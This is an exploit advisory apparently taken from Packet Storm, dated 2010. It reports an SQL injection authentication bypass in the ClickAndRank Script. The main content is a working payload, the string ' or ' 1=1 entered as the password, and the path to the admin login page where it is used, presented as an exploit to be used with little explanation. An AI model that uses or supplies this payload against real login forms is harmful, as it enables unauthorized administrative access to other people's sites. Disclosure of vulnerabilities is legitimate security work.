ClickAndRank Script suffers from a remote SQL injection vulnerability that allows for authentication bypass.
c1f0d0f3ce7451d7e4ab8651042b9667af817955c8e77e33e44e7b6c8106af7d# Exploit Title: ClickAndRank Script Authentication Bypass
# Date: [18/07/2010]
# Author: [walid]
# Software Link: [null]
# Version: [null]
# Tested on: [Windows]
# CVE: [null]
* Found By: WaLiD
* E-mail: Rezultas[at]Gmail[Dot]com
* GreeTZ: [Amine]/[v4-team.com]/[Madjix]
---------------------------------------------------------
Vendor: http://www.icash.ch/index.html?ClickAndRank/details.asp
---------------------------------------------------------
Exploit Auth Bypass:
login: walid
passw: ' or ' 1=1
----------------------------------------------------------
-[!]
Demo :
http://<site>/index.html?ClickAndRank/admin.asp
----------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed